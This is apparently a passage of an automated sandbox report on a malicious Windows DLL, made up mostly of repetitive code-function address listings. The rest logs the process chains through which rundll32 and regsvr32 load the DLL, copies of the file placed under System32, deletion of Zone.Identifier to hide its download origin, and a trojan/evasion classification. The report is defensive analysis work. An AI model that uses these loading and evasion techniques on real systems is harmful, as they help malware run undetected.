                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180024D805_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800185985_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800035985_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002A9A85_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800119A85_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180025DAC5_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018DAC5_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800269B05_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800059B85_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800029BC5_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800141C05_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800125C45_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800121CC5_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800075D45_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800095DC5_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000F9E85_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800026105_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800196185_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180013E285_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001FA385_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000A2705_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180019E785_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001DA805_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800246985_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000EE985_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800176B85_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001AAB85_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180011AD05_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180008AD85_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800296EC5_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000A6EC5_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800132F05_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800193005_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001BB045_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002870C5_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180026B105_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000131C5_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000671C5_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180029B285_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180012F285_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BB285_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001EB305_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800203345_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800107585_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001435C5_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009F5C5_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800293685_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800207685_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800173785_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800137805_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800153885_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000338C5_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000738C5_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800027905_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800197A05_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002C7B45_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001DFB45_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001F7C05_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800097C05_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800157D85_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180019FDC5_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180017BDC5_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000F7E05_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001FE05_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000028DC9D100005_2_0000028DC9D10000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00F200007_2_00F20000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010FF47_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180028C207_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C0587_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ACA47_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000551C7_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800181487_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001496C7_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E1E07_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C6087_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800216187_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013E287_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002AE447_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C7_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800252787_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000EE987_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800046A87_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180004ACA7_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800132F07_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026B107_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DBE87_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001FC0C7_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000580C7_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800220107_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001481C7_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002A42C7_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800118347_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180021C3C7_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000703C7_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000AC487_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000FC487_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800244587_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800064587_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C05C7_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A4607_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800298887_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D49C7_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008CA07_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248A87_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015CB07_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800124B47_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C4B47_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800288B87_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800024B87_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D8C47_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800250CC7_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800190D47_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017CE47_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800264F07_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800014F87_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020CFC7_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800091007_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002C9047_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800179087_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800215107_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F9177_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F1287_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001CD387_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016D3C7_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F9447_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D9507_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800131507_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ED507_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E9607_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019D607_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C9647_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001C5687_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001D687_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002D707_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800245747_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800021787_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180024D807_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800185987_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800035987_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F1A47_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002A9A87_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800119A87_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025DAC7_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018DAC7_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800269B07_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800059B87_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800029BC7_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800141C07_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800125C47_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800121CC7_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BDD07_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800075D47_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800095DC7_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F9E87_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800026107_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800196187_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001FA387_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A2707_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180019E787_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DA807_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800246987_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800176B87_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001AAB87_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002CAD07_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180011AD07_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008AD87_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800296EC7_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A6EC7_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800193007_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001BB047_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002870C7_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000131C7_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000671C7_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029B287_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180012F287_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BB287_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EB307_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800203347_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800107587_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001435C7_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180009F5C7_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800293687_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800207687_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: 2V7zjcga5L.dllVirustotal: Detection: 32%
                      Source: 2V7zjcga5L.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\2V7zjcga5L.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal76.troj.evad.winDLL@19/5@0/3
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800046A8 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,7_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 2V7zjcga5L.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: 2V7zjcga5L.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001AFFD push ebp; retf 5_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800051D1 push ebp; iretd 5_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001BA32 push ebp; retf 5_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004E83 push es; ret 5_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B694 push es; ret 5_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001BADD push ebp; iretd 5_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B717 push ebp; iretd 5_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180007B3F push esp; retf 5_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001AF4E push ebp; retf 5_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800051D1 push ebp; iretd 7_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180004E83 push es; ret 7_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180007B3F push esp; retf 7_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA526A7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,3_2_00007FFA526A7BE8
                      Source: 2V7zjcga5L.dllStatic PE information: real checksum: 0x85ab6 should be: 0x9110a
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
                      Source: C:\Windows\System32\rundll32.exePE file moved: C:\Windows\System32\TvhlOU\CPyd.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\JoOzHOkj\lOBjGnbzgLJQ.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\TvhlOU\CPyd.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\EyNaV\uwKfjswbvPYcDYp.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5832Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3000Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6224Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-10006
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-10007
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
